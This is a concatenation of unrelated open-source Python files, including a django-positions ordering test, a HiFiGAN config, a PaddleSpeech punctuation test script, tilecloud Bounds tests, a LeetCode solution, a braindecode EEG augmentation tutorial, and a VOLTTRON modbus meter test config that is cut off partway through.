# save an item without changing it's position
self.exercise = self.l.items.order_by('-position')[0]
self.exercise.name = 'Exercise'
self.exercise.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Learn to spell Exercise', 0), (u'Write Tests', 1), (u'Exercise', 2)]
self.assertEqual(result, expected_result)
# delete an item
self.learn_to_spell = self.l.items.order_by('position')[0]
self.learn_to_spell.delete()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1)]
self.assertEqual(result, expected_result)
# create a couple more items
result = self.l.items.create(name='Drink less Coke').name
expected_result = 'Drink less Coke'
self.assertEqual(result, expected_result)
result = self.l.items.create(name='Go to Bed').name
expected_result = 'Go to Bed'
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Write Tests', 0), (u'Exercise', 1), (u'Drink less Coke', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to end using None
self.write_tests = self.l.items.order_by('position')[0]
self.write_tests.position = None
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Drink less Coke', 1), (u'Go to Bed', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
# move item using negative index
self.write_tests.position = -3
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Write Tests', 1), (u'Drink less Coke', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to position
self.write_tests.position = 2
self.write_tests.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Exercise', 0), (u'Drink less Coke', 1), (u'Write Tests', 2), (u'Go to Bed', 3)]
self.assertEqual(result, expected_result)
# move item to beginning
self.sleep = self.l.items.order_by('-position')[0]
self.sleep.position = 0
self.sleep.save()
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Exercise', 1), (u'Drink less Coke', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
# check auto_now updates
time.sleep(1) # sleep to guarantee updated time increases
sleep_updated, exercise_updated, eat_better_updated, write_tests_updated = [i.updated for i in self.l.items.order_by('position')]
self.eat_better = self.l.items.order_by('-position')[1]
self.eat_better.position = 1
self.eat_better.save()
self.todo_list = list(self.l.items.order_by('position'))
self.assertEqual(sleep_updated, self.todo_list[0].updated)
self.assertLessEqual(eat_better_updated, self.todo_list[1].updated)
self.assertLessEqual(exercise_updated, self.todo_list[2].updated)
# create an item using negative index
# http://github.com/jpwatts/django-positions/issues/#issue/5
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Write Tests', 3)]
self.assertEqual(result, expected_result)
self.fix_issue_5 = Item(list=self.l, name="Fix Issue #5")
result = self.fix_issue_5.position
expected_result = -1
self.assertEqual(result, expected_result)
self.fix_issue_5.position = -2
result = self.fix_issue_5.position
expected_result = -2
self.assertEqual(result, expected_result)
self.fix_issue_5.save()
result = self.fix_issue_5.position
expected_result = 3
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Fix Issue #5', 3), (u'Write Tests', 4)]
self.assertEqual(result, expected_result)
# Try again, now that the model has been saved.
self.fix_issue_5.position = -2
self.fix_issue_5.save()
result = self.fix_issue_5.position
expected_result = 3
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Go to Bed', 0), (u'Drink less Coke', 1), (u'Exercise', 2), (u'Fix Issue #5', 3), (u'Write Tests', 4)]
self.assertEqual(result, expected_result)
# create an item using with a position of zero
# http://github.com/jpwatts/django-positions/issues#issue/7
self.item0 = self.l.items.create(name="Fix Issue #7", position=0)
result = self.item0.position
expected_result = 0
self.assertEqual(result, expected_result)
result = list(self.l.items.values_list('name', 'position').order_by('position'))
expected_result = [(u'Fix Issue #7', 0), (u'Go to Bed', 1), (u'Drink less Coke', 2), (u'Exercise', 3), (u'Fix Issue #5', 4), (u'Write Tests', 5)]
self.assertEqual(result, expected_result)
|
malaya_speech/config/hifigan.py | dtx525942103/malaya-speech | 111 | 12746123 | config = {
'sampling_rate': 22050,
'hop_size': 256,
'model_type': 'hifigan_generator',
'hifigan_generator_params': {
'out_channels': 1,
'kernel_size': 7,
'filters': 128,
'use_bias': True,
'upsample_scales': [8, 8, 2, 2],
'stacks': 3,
'stack_kernel_size': [3, 7, 11],
'stack_dilation_rate': [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
'use_final_nolinear_activation': True,
'is_weight_norm': False,
},
'hifigan_discriminator_params': {
'out_channels': 1,
'period_scales': [2, 3, 5, 7, 11],
'n_layers': 5,
'kernel_size': 5,
'strides': 3,
'filters': 8,
'filter_scales': 4,
'max_filters': 512,
'is_weight_norm': False,
},
'melgan_discriminator_params': {
'out_channels': 1,
'scales': 3,
'downsample_pooling': 'AveragePooling1D',
'downsample_pooling_params': {'pool_size': 4, 'strides': 2},
'kernel_sizes': [5, 3],
'filters': 16,
'max_downsample_filters': 512,
'downsample_scales': [4, 4, 4, 4],
'nonlinear_activation': 'LeakyReLU',
'nonlinear_activation_params': {'alpha': 0.2},
'is_weight_norm': False,
},
'stft_loss_params': {
'fft_lengths': [1024, 2048, 512],
'frame_steps': [120, 240, 50],
'frame_lengths': [600, 1200, 240],
},
'lambda_feat_match': 10.0,
'lambda_adv': 4.0,
'batch_size': 16,
'batch_max_steps': 8192,
'batch_max_steps_valid': 81920,
'remove_short_samples': True,
'allow_cache': True,
'is_shuffle': True,
}
|
paddlespeech/text/exps/ernie_linear/test.py | JiehangXie/PaddleSpeech | 1,540 | 12746129 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import numpy as np
import paddle
import pandas as pd
import yaml
from paddle import nn
from paddle.io import DataLoader
from sklearn.metrics import classification_report
from sklearn.metrics import precision_recall_fscore_support
from yacs.config import CfgNode
from paddlespeech.text.models.ernie_linear import ErnieLinear
from paddlespeech.text.models.ernie_linear import PuncDataset
from paddlespeech.text.models.ernie_linear import PuncDatasetFromErnieTokenizer
DefinedClassifier = {
'ErnieLinear': ErnieLinear,
}
DefinedLoss = {
"ce": nn.CrossEntropyLoss,
}
DefinedDataset = {
'Punc': PuncDataset,
'Ernie': PuncDatasetFromErnieTokenizer,
}
def evaluation(y_pred, y_test):
precision, recall, f1, _ = precision_recall_fscore_support(
y_test, y_pred, average=None, labels=[1, 2, 3])
overall = precision_recall_fscore_support(
y_test, y_pred, average='macro', labels=[1, 2, 3])
result = pd.DataFrame(
np.array([precision, recall, f1]),
columns=list(['O', 'COMMA', 'PERIOD', 'QUESTION'])[1:],
index=['Precision', 'Recall', 'F1'])
result['OVERALL'] = overall[:3]
return result
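

# Illustrative call (not part of the original script); the label ids follow the code
# above, where 0 is "no punctuation" and 1/2/3 map to COMMA/PERIOD/QUESTION:
#   evaluation(y_pred=[1, 2, 0, 3], y_test=[1, 2, 0, 1])
# returns a DataFrame with Precision/Recall/F1 rows, one column per punctuation class
# and an OVERALL macro average computed over labels 1-3 only.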
def test(args):
with open(args.config) as f:
config = CfgNode(yaml.safe_load(f))
print("========Args========")
print(yaml.safe_dump(vars(args)))
print("========Config========")
print(config)
test_dataset = DefinedDataset[config["dataset_type"]](
train_path=config["test_path"], **config["data_params"])
test_loader = DataLoader(
test_dataset,
batch_size=config.batch_size,
shuffle=False,
drop_last=False)
model = DefinedClassifier[config["model_type"]](**config["model"])
state_dict = paddle.load(args.checkpoint)
model.set_state_dict(state_dict["main_params"])
model.eval()
punc_list = []
for i in range(len(test_loader.dataset.id2punc)):
punc_list.append(test_loader.dataset.id2punc[i])
test_total_label = []
test_total_predict = []
for i, batch in enumerate(test_loader):
input, label = batch
label = paddle.reshape(label, shape=[-1])
y, logit = model(input)
pred = paddle.argmax(logit, axis=1)
test_total_label.extend(label.numpy().tolist())
test_total_predict.extend(pred.numpy().tolist())
t = classification_report(
test_total_label, test_total_predict, target_names=punc_list)
print(t)
t2 = evaluation(test_total_label, test_total_predict)
print('=========================================================')
print(t2)
def main():
# parse args and config and redirect to train_sp
parser = argparse.ArgumentParser(description="Test a ErnieLinear model.")
parser.add_argument("--config", type=str, help="ErnieLinear config file.")
parser.add_argument("--checkpoint", type=str, help="snapshot to load.")
parser.add_argument(
"--ngpu", type=int, default=1, help="if ngpu=0, use cpu.")
args = parser.parse_args()
if args.ngpu == 0:
paddle.set_device("cpu")
elif args.ngpu > 0:
paddle.set_device("gpu")
else:
print("ngpu should >= 0 !")
test(args)
if __name__ == "__main__":
main()
|
tests/unit/fixtures/fail_exporter.py | ClementPruvot/slo-generator | 243 | 12746139 | <filename>tests/unit/fixtures/fail_exporter.py
"""dummy_exporter.py
Dummy exporter implementation for testing.
"""
# pylint: disable=missing-class-docstring
from slo_generator.exporters.base import MetricsExporter
class FailExporter(MetricsExporter):
def export_metric(self, data):
raise ValueError("Oops !")
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/GridNode.py | htlcnn/ironpython-stubs | 182 | 12746140 | class GridNode(object):
"""
A structure that represents a particular location in (U,V) from a grid.
GridNode(uIndex: int,vIndex: int)
"""
@staticmethod
def __new__(self,uIndex,vIndex):
"""
__new__[GridNode]() -> GridNode
__new__(cls: type,uIndex: int,vIndex: int)
"""
pass
UIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The node's index along the U axis.
Get: UIndex(self: GridNode) -> int
Set: UIndex(self: GridNode)=value
"""
VIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The node's index along the V axis.
Get: VIndex(self: GridNode) -> int
Set: VIndex(self: GridNode)=value
"""
|
tilecloud/tests/test_bounds.py | camptocamp/tilecloud | 134 | 12746147 | import unittest
from tilecloud import Bounds
class TestBounds(unittest.TestCase):
def test_empty(self) -> None:
bounds = Bounds()
assert len(bounds) == 0
assert 1 not in bounds
self.assertRaises(StopIteration, next, iter(bounds))
assert bounds == bounds
def test_init_one_argument(self) -> None:
bounds = Bounds(1)
assert list(bounds) == [1]
def test_init_two_arguments(self) -> None:
bounds = Bounds(1, 3)
assert list(bounds) == [1, 2]
def test_add(self) -> None:
bounds = Bounds()
assert len(bounds) == 0
bounds.add(1)
assert list(bounds) == [1]
bounds.add(1)
assert list(bounds) == [1]
bounds.add(2)
assert list(bounds) == [1, 2]
def test_update(self) -> None:
bounds1 = Bounds(1, 3)
bounds2 = Bounds(3, 5)
self.assertTrue(bounds1.update(bounds2) is bounds1)
self.assertEqual(len(bounds1), 4)
self.assertEqual(list(bounds1), [1, 2, 3, 4])
def test_update_empty(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds(3, 5)
assert bounds1.update(bounds2) is bounds1
assert list(bounds1) == [3, 4]
def test_union_empty_empty(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds()
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert len(bounds3) == 0
def test_union_empty_normal(self) -> None:
bounds1 = Bounds()
bounds2 = Bounds(3, 5)
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [3, 4]
def test_union_normal_empty(self) -> None:
bounds1 = Bounds(1, 3)
bounds2 = Bounds()
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [1, 2]
def test_union_normal_normal(self) -> None:
bounds1 = Bounds(1, 3)
bounds2 = Bounds(3, 5)
bounds3 = bounds1.union(bounds2)
assert bounds3 is not bounds1
assert bounds3 is not bounds2
assert list(bounds3) == [1, 2, 3, 4]
|
questions/range-addition-ii/Solution.py | marcus-aurelianus/leetcode-solutions | 141 | 12746148 | <gh_stars>100-1000
"""
You are given an m x n matrix M initialized with all 0's and an array of operations ops, where ops[i] = [ai, bi] means M[x][y] should be incremented by one for all 0 <= x < ai and 0 <= y < bi.
Count and return the number of maximum integers in the matrix after performing all the operations.
Example 1:
Input: m = 3, n = 3, ops = [[2,2],[3,3]]
Output: 4
Explanation: The maximum integer in M is 2, and there are four of it in M. So return 4.
Example 2:
Input: m = 3, n = 3, ops = [[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3]]
Output: 4
Example 3:
Input: m = 3, n = 3, ops = []
Output: 9
Constraints:
1 <= m, n <= 4 * 10^4
1 <= ops.length <= 10^4
ops[i].length == 2
1 <= ai <= m
1 <= bi <= n
"""
class Solution(object):
def maxCount(self, m, n, ops):
"""
:type m: int
:type n: int
:type ops: List[List[int]]
:rtype: int
"""
my, mx = m, n
for op in ops:
my = min(my, op[0])
mx = min(mx, op[1])
return my * mx |
examples/plot_data_augmentation.py | braindecode/braindecode | 301 | 12746164 | <gh_stars>100-1000
"""
Data Augmentation on BCIC IV 2a Dataset
=======================================
This tutorial shows how to train EEG deep models with data augmentation. It
follows the trial-wise decoding example and also illustrates the effect of a
transform on the input signals.
.. contents:: This example covers:
:local:
:depth: 2
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
######################################################################
# Loading and preprocessing the dataset
# -------------------------------------
######################################################################
# Loading
# ~~~~~~~
#
from braindecode import EEGClassifier
from skorch.helper import predefined_split
from skorch.callbacks import LRScheduler
from braindecode.datasets import MOABBDataset
subject_id = 3
dataset = MOABBDataset(dataset_name="BNCI2014001", subject_ids=[subject_id])
######################################################################
# Preprocessing
# ~~~~~~~~~~~~~
#
from braindecode.preprocessing import (
exponential_moving_standardize, preprocess, Preprocessor, scale)
low_cut_hz = 4. # low cut frequency for filtering
high_cut_hz = 38. # high cut frequency for filtering
# Parameters for exponential moving standardization
factor_new = 1e-3
init_block_size = 1000
preprocessors = [
Preprocessor('pick_types', eeg=True, meg=False, stim=False), # Keep EEG sensors
Preprocessor(scale, factor=1e6, apply_on_array=True), # Convert from V to uV
Preprocessor('filter', l_freq=low_cut_hz, h_freq=high_cut_hz), # Bandpass filter
Preprocessor(exponential_moving_standardize, # Exponential moving standardization
factor_new=factor_new, init_block_size=init_block_size)
]
preprocess(dataset, preprocessors)
######################################################################
# Extracting windows
# ~~~~~~~~~~~~~~~~~~
#
from braindecode.preprocessing import create_windows_from_events
trial_start_offset_seconds = -0.5
# Extract sampling frequency, check that they are same in all datasets
sfreq = dataset.datasets[0].raw.info['sfreq']
assert all([ds.raw.info['sfreq'] == sfreq for ds in dataset.datasets])
# Calculate the trial start offset in samples.
trial_start_offset_samples = int(trial_start_offset_seconds * sfreq)
# Create windows using braindecode function for this. It needs parameters to
# define how trials should be used.
windows_dataset = create_windows_from_events(
dataset,
trial_start_offset_samples=trial_start_offset_samples,
trial_stop_offset_samples=0,
preload=True,
)
######################################################################
# Split dataset into train and valid
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
splitted = windows_dataset.split('session')
train_set = splitted['session_T']
valid_set = splitted['session_E']
######################################################################
# Defining a Transform
# --------------------
#
######################################################################
# Data can be manipulated by transforms, which are callable objects. A
# transform is usually handled by a custom data loader, but can also be called
# directly on input data, as demonstrated below for illustrative purposes.
#
# First, we need to define a Transform. Here we chose the FrequencyShift, which
# randomly translates all frequencies within a given range.
from braindecode.augmentation import FrequencyShift
transform = FrequencyShift(
probability=1., # defines the probability of actually modifying the input
sfreq=sfreq,
max_delta_freq=2. # the frequency shifts are sampled now between -2 and 2 Hz
)
######################################################################
# Manipulating one session and visualizing the transformed data
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Next, let us augment one session to show the resulting frequency shift. The
# data of an mne Epoch is used here to make use of mne functions.
import torch
epochs = train_set.datasets[0].windows # original epochs
X = epochs.get_data()
# This allows to apply the transform with a fixed shift (10 Hz) for
# visualization instead of sampling the shift randomly between -2 and 2 Hz
X_tr, _ = transform.operation(torch.as_tensor(X).float(), None, 10., sfreq)
######################################################################
# The PSD of the transformed session has now been shifted by 10 Hz, as one can
# see on the PSD plot.
import mne
import matplotlib.pyplot as plt
import numpy as np
def plot_psd(data, axis, label, color):
psds, freqs = mne.time_frequency.psd_array_multitaper(data, sfreq=sfreq,
fmin=0.1, fmax=100)
psds = 10. * np.log10(psds)
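    # psds has shape (n_epochs, n_channels, n_freqs): average over epochs, then over channels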
psds_mean = psds.mean(0).mean(0)
axis.plot(freqs, psds_mean, color=color, label=label)
_, ax = plt.subplots()
plot_psd(X, ax, 'original', 'k')
plot_psd(X_tr.numpy(), ax, 'shifted', 'r')
ax.set(title='Multitaper PSD (gradiometers)', xlabel='Frequency (Hz)',
ylabel='Power Spectral Density (dB)')
ax.legend()
plt.show()
######################################################################
# Training a model with data augmentation
# ---------------------------------------
#
# Now that we know how to instantiate ``Transforms``, it is time to learn how
# to use them to train a model and try to improve its generalization power.
# Let's first create a model.
#
# Create model
# ~~~~~~~~~~~~
#
######################################################################
# The model to be trained is defined as usual.
from braindecode.util import set_random_seeds
from braindecode.models import ShallowFBCSPNet
cuda = torch.cuda.is_available() # check if GPU is available, if True chooses to use it
device = 'cuda' if cuda else 'cpu'
if cuda:
torch.backends.cudnn.benchmark = True
# Set random seed to be able to reproduce results
seed = 20200220
set_random_seeds(seed=seed, cuda=cuda)
n_classes = 4
# Extract number of chans and time steps from dataset
n_channels = train_set[0][0].shape[0]
input_window_samples = train_set[0][0].shape[1]
model = ShallowFBCSPNet(
n_channels,
n_classes,
input_window_samples=input_window_samples,
final_conv_length='auto',
)
######################################################################
# Create an EEGClassifier with the desired augmentation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
######################################################################
# In order to train with data augmentation, a custom data loader can be used
# for the training. Multiple transforms can be passed to it and will be applied
# sequentially to the batched data within the ``AugmentedDataLoader`` object.
from braindecode.augmentation import AugmentedDataLoader, SignFlip
freq_shift = FrequencyShift(
probability=.5,
sfreq=sfreq,
max_delta_freq=2. # the frequency shifts are sampled now between -2 and 2 Hz
)
sign_flip = SignFlip(probability=.1)
transforms = [
freq_shift,
sign_flip
]
# Send model to GPU
if cuda:
model.cuda()
######################################################################
# The model is now trained as in the trial-wise example. The
# ``AugmentedDataLoader`` is used as the train iterator and the list of
# transforms is passed as an argument.
lr = 0.0625 * 0.01
weight_decay = 0
batch_size = 64
n_epochs = 4
clf = EEGClassifier(
model,
iterator_train=AugmentedDataLoader, # This tells EEGClassifier to use a custom DataLoader
iterator_train__transforms=transforms, # This sets the augmentations to use
criterion=torch.nn.NLLLoss,
optimizer=torch.optim.AdamW,
train_split=predefined_split(valid_set), # using valid_set for validation
optimizer__lr=lr,
optimizer__weight_decay=weight_decay,
batch_size=batch_size,
callbacks=[
"accuracy",
("lr_scheduler", LRScheduler('CosineAnnealingLR', T_max=n_epochs - 1)),
],
device=device,
)
# Model training for a specified number of epochs. `y` is None as it is already
# supplied in the dataset.
clf.fit(train_set, y=None, epochs=n_epochs)
######################################################################
# Manually composing Transforms
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# It would be equivalent (although more verbose) to pass to ``EEGClassifier`` a
# composition of the same transforms:
from braindecode.augmentation import Compose
composed_transforms = Compose(transforms=transforms)
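# A minimal sketch (not run here, and only an assumption about equivalent usage):
# since ``Compose`` is itself a transform, it could be passed to ``EEGClassifier``
# in place of the list above, e.g. ``iterator_train__transforms=[composed_transforms]``.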
######################################################################
# Setting the data augmentation at the Dataset level
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Note that it is also possible to pass most of the transforms
# directly to the WindowsDataset object through the `transform` argument, as
# most commonly done in other libraries. However, it is advised to use the
# ``AugmentedDataLoader`` as above, as it is compatible with all transforms and
# can be more efficient.
train_set.transform = composed_transforms
|
services/core/PlatformDriverAgent/platform_driver/interfaces/modbus_tk/tests/test_battery_meter.py | cloudcomputingabc/volttron | 406 | 12746196 | import pytest
import gevent
import logging
import time
from volttron.platform import get_services_core, jsonapi
from volttrontesting.utils.utils import get_rand_ip_and_port
from platform_driver.interfaces.modbus_tk.server import Server
from platform_driver.interfaces.modbus_tk.maps import Map, Catalog
from volttron.platform.agent.known_identities import PLATFORM_DRIVER
logger = logging.getLogger(__name__)
IP, _port = get_rand_ip_and_port().split(":")
PORT = int(_port)
# New modbus_tk driver config
DRIVER_CONFIG = {
"driver_config": {
"name": "test",
"device_address": IP,
"port": PORT,
"slave_id": 1,
"addressing": "offset",
"register_map": "config://modbus_tk_map.csv"
},
"driver_type": "modbus_tk",
"registry_config": "config://modbus_tk.csv",
"interval": 60,
"timezone": "UTC"
}
# New modbus_tk csv config
REGISTRY_CONFIG_STRING = """Volttron Point Name,Register Name
BRAND (),BRAND ()
MODEL (),MODEL ()
COMS STATUS (),COMS STATUS ()
COMS QUALITY (),COMS QUALITY ()
NUMBER OF QUERIES (),NUMBER OF QUERIES ()
NUMBER OF FAILS (),NUMBER OF FAILS ()
DATE LAST ACQUISITION (),DATE LAST ACQUISITION ()
LAST SAMPLING DURATION (s),LAST SAMPLING DURATION (s)
ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)
REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)
REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)
REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)
REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)
REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)
REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)
APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)
APPARENT QUADRANTS 1-4 IMPORT (kVAh),APPARENT QUADRANTS 1-4 IMPORT (kVAh)
APPARENT QUADRANTS 2-3 EXPORT (kVAh),APPARENT QUADRANTS 2-3 EXPORT (kVAh)
TOTAL INSTANTANEOUS REAL POWER (kW),TOTAL INSTANTANEOUS REAL POWER (kW)
TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)
TOTAL INSTANTANEOUS APPARENT POWER (kVA),TOTAL INSTANTANEOUS APPARENT POWER (kVA)
TOTAL POWER FACTOR (-),TOTAL POWER FACTOR (-)
AVERAGE VOLTAGE L-L (V),AVERAGE VOLTAGE L-L (V)
AVERAGE VOLTAGE L-N (V),AVERAGE VOLTAGE L-N (V)
AVERAGE CURRENT (A),AVERAGE CURRENT (A)
FREQUENCY (Hz),FREQUENCY (Hz)
TOTAL REAL POWER PRESENT DEMAND (kW),TOTAL REAL POWER PRESENT DEMAND (kW)
TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)
TOTAL APPARENT POWER PRESENT DEMAND (kVA),TOTAL APPARENT POWER PRESENT DEMAND (kVA)
TOTAL REAL POWER MAX. DEMAND IMPORT (kW),TOTAL REAL POWER MAX. DEMAND IMPORT (kW)
TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR)
TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)
TOTAL REAL POWER MAX. DEMAND EXPORT (kW),TOTAL REAL POWER MAX. DEMAND EXPORT (kW)
TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)
TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA)
PULSE COUNTER 1 (-),PULSE COUNTER 1 (-)
PULSE COUNTER 2 (-),PULSE COUNTER 2 (-)
ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)
ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)
ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)
ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)
ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)
ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)
ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)
ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)
ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)
ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)
REAL POWER PHASE A (kW),REAL POWER PHASE A (kW)
REAL POWER PHASE B (kW),REAL POWER PHASE B (kW)
REAL POWER PHASE C (kW),REAL POWER PHASE C (kW)
REACTIVE POWER PHASE A (kVAR),REACTIVE POWER PHASE A (kVAR)
REACTIVE POWER PHASE B (kVAR),REACTIVE POWER PHASE B (kVAR)
REACTIVE POWER PHASE C (kVAR),REACTIVE POWER PHASE C (kVAR)
APPARENT POWER PHASE A (kVA),APPARENT POWER PHASE A (kVA)
APPARENT POWER PHASE B (kVA),APPARENT POWER PHASE B (kVA)
APPARENT POWER PHASE C (kVA),APPARENT POWER PHASE C (kVA)
POWER FACTOR PHASE A (-),POWER FACTOR PHASE A (-)
POWER FACTOR PHASE B (-),POWER FACTOR PHASE B (-)
POWER FACTOR PHASE C (-),POWER FACTOR PHASE C (-)
VOLTAGE PHASE A-B (V),VOLTAGE PHASE A-B (V)
VOLTAGE PHASE B-C (V),VOLTAGE PHASE B-C (V)
VOLTAGE PHASE A-C (V),VOLTAGE PHASE A-C (V)
VOLTAGE PHASE A-N (V),VOLTAGE PHASE A-N (V)
VOLTAGE PHASE B-N (V),VOLTAGE PHASE B-N (V)
VOLTAGE PHASE C-N (V),VOLTAGE PHASE C-N (V)
CURRENT PHASE A (A),CURRENT PHASE A (A)
CURRENT PHASE B (A),CURRENT PHASE B (A)
CURRENT PHASE C (A),CURRENT PHASE C (A)"""
